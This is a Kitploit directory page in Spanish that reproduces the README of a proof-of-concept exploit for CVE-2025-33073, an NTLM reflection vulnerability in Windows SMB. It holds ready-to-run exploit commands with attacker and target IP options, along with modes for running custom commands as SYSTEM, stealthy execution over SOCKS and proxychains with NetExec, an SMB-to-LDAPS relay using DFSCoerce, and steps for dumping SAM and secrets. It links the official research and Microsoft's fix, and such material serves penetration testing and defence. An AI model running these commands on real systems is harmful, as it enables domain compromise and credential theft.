Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-33073 — PoC Exploit para la vulnerabilidad SMB de reflexión NTLM. | Kitploit
Herramientas/GitHubGitHub/mverschu/cve-2025-33073
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónSeguridad de RedesPruebas de PenetraciónAutenticación
GitHubmverschu/cve-2025-33073

CVE-2025-33073

PoC Exploit para la vulnerabilidad SMB de reflexión NTLM.

Ver Repositorio
714136hace 6 mesesRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-33073

Exploit PoC para la vulnerabilidad de reflexión NTLM en SMB.

image

Todo el crédito va para la investigación oficial:
https://www.synacktiv.com/en/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025

Requisitos previos

SO: Kali Linux (tiene la mayoría de los paquetes preinstalados).

  • NetExec (NXC) - https://github.com/Pennyw0rth/NetExec
  • impacket-ntlmrelayx
  • dnstool.py (incluido en el repositorio)

Configuración

La herramienta usará automáticamente un entorno virtual. Para configurarlo, ejecuta:

root@kitploit:~
./setup.sh

Esto creará un entorno virtual e instalará todas las dependencias necesarias, incluida ldap3-bleeding-edge==2.10.1.1337.

Ejemplo de uso

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65
image

Comando personalizado
En lugar de ejecutar secretsdump, se puede ejecutar un comando personalizado.

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --custom-command "whoami"

image

SOCKS
Para una ejecución más sigilosa de comandos después de haber establecido una conexión válida como SYSTEM. Aquí --target y --target-ip deben ser iguales.

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --socks

image También se puede ejecutar un comando personalizado a través de proxychains en lugar de volcar SAM.

root@kitploit:~
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec

image

Reenvío del exploit a LDAPS incluso con la firma SMB habilitada

Se ha realizado una investigación para comprobar si la reflexión realmente no funcionaba con la firma SMB habilitada, lo que llevó a encontrar fallos en los que, si se eliminan SIGN/SEAL del paquete, es posible reenviar desde SMB a LDAPS, algo que normalmente no es posible debido al MIC.

Gracias a:

  • https://github.com/decoder-it/impacket-partial-mic/
  • https://decoder.cloud/2025/11/24/reflecting-your-authentication-when-windows-ends-up-talking-to-itself/
  • https://www.depthsecurity.com/blog/using-ntlm-reflection-to-own-active-directory/
root@kitploit:~
python3 CVE-2025-33073.py -u "thewoods.local\test" -p 'pass' -d 192.168.204.131 --dns-ip 192.168.204.133 --dc-fqdn DC01.thewoods.local --target 192.168.204.133 --target-ip 192.168.204.133 -M DFSCoerce --smb-signing
image

Explotación manual sin necesidad de DNS

Si estás en el mismo dominio de difusión que el dispositivo y es vulnerable al envenenamiento LLMNR, es posible explotar un dispositivo sin tener que registrar un registro DNS.

image

Solución de problemas

  • He visto que el ataque a veces no funciona porque se usa el nombre de host para el ataque, lo que resulta en una consulta DNS desde Kali. Si Kali no está usando el servidor DNS u obtienes un mensaje '/ FAILED' de impacket-ntlmrelayx, intenta añadir el host a tu archivo /etc/hosts. Esto debería hacer que el ataque funcione.
  • Si se usa una IP, el ataque debería funcionar. A veces, ejecutarlo varias veces resulta en un SUCCESS en lugar de un fallo. Hasta ahora no está del todo claro por qué ocurre esto. Creo que tiene algo que ver con la red.
  • Prueba otro método de coerción usando -M o --method.

Wireshark

La autenticación NTLM local tiene lugar image

La autenticación NTLM local no tiene lugar, lo que resulta en un intento FAILED image

Es bueno saber

  • El registro DNS también debe ser conocido por el cliente; en algunas ocasiones esto puede tardar más. Con "más tiempo" me refiero a que le des un par de minutos.
  • Esto es solo un PoC, lo que significa que no se han probado evasiones de AV/EDR. Úsalo bajo tu propio riesgo.

Cómo solucionarlo

https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-33073

Descargar herramienta